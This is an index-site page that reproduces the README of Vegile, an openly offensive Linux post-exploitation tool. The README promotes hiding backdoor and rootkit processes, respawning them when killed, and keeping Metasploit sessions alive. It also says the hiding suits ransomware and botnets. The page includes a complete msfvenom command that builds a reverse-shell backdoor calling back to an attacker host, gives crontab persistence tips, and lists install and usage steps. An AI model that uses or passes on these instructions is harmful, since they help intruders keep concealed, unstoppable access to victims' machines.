Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/screetsec/Vegile

This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
https://github.com/screetsec/Vegile

backdoor ghost indonesia infinite-scroll inject linux metasploit msfvenom post-exploitation postgresql rootkit unlimited

Last synced: about 1 month ago
JSON representation

This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell

Awesome Lists containing this project

README

        

# Vegile - Ghost In The Shell

[![Version](https://img.shields.io/badge/Vegile-Beta-brightgreen.svg?maxAge=259200)]()
[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()
[![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]()

**Vegile** is a tool for **Post exploitation** Techniques in linux. Post Exploitation techniques will ensure that we maintain some level of **access and can potentially** lead to **deeper** footholds into our targets **trusted network**.

### Donate
- If this project is very helpful to your penetration testing and u want to support me , you can give me a cup of coffee :)
- [![Donation](https://img.shields.io/badge/bitcoin-donate-yellow.svg)](https://blockchain.info/id/address/1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS)

## :book: How it works

This tool will set up your ***backdoor/rootkits***
when backdoor is already setup it will be ***hidden*** your specific process,***unlimited*** your ***session*** in metasploit and ***transparent***. Even when it is **killed**, it will **re-run again**. There will always be a procces which will **run** another process, so we can assume that this procces is **unstopable** like a **Ghost in The Shell**

#### READ THIS

- Right now I just tested backdoor with msfvenom command using reverse_shell and my manual backdoor for linux [ **it works** ] or you can use thefatrat for to help you create a simple backdoor
- **msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR**
- for hidden process you can use for **rootkits,backdoor,ransom and botnet** { sh,python,perl,exe and binary }.
- Victim target all linux distribution include ( **base32** and **base64** in their system )
- For get persistence you can use **crontab and xinit.d** into your backdoor
- this is just a simple algorithm how we can maintain our sessions and backdoor/rootkits , **you can explore this**

## Getting Started
1. ```git clone https://github.com/Screetsec/Vegile.git```
2. ```cd Vegile```
3. ```chmod +x Vegile```

## Using Vegile
Running Vegile without any parameters will give a helpful list of the most common options. you can use command :

- Vegile -i / --inject **[backdoor/rootkit]**
- Vegile -u / --unlimited **[backdoor/rootkit]**
- Vegile -h / --help

## Demo Video

- [![Vegile demo](https://user-images.githubusercontent.com/17976841/34897525-f91afc1a-f820-11e7-9f85-bb0a5f00b4e3.JPG)](https://www.youtube.com/watch?v=oYyH1G3Lsvo "Vegile Demo ")

- [![Vegile demo](https://user-images.githubusercontent.com/17976841/34897524-f887a258-f820-11e7-9ceb-a39da5be6fdf.JPG)](https://www.youtube.com/watch?v=imlh8l5w56k "Vegile Demo ")

## :octocat: Credits

- Thanks to allah
- Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
- Bash.ID , WingkoColi , Reversing ID , IndoXploit , Backbox Indonesia , Depok Cyber Security and Indonesia Backtrack Team .
- Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
- http://www.kali.org/ Kali Linux
- gianlucaborello to give a reference and some idea [ https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/ ]
- And another open sources tool in github

## Disclaimer

***Note: modifications, changes, or alterations to this sourcecode is acceptable, however, any public releases utilizing this code must be approved by writen this tool ( Edo maland ).***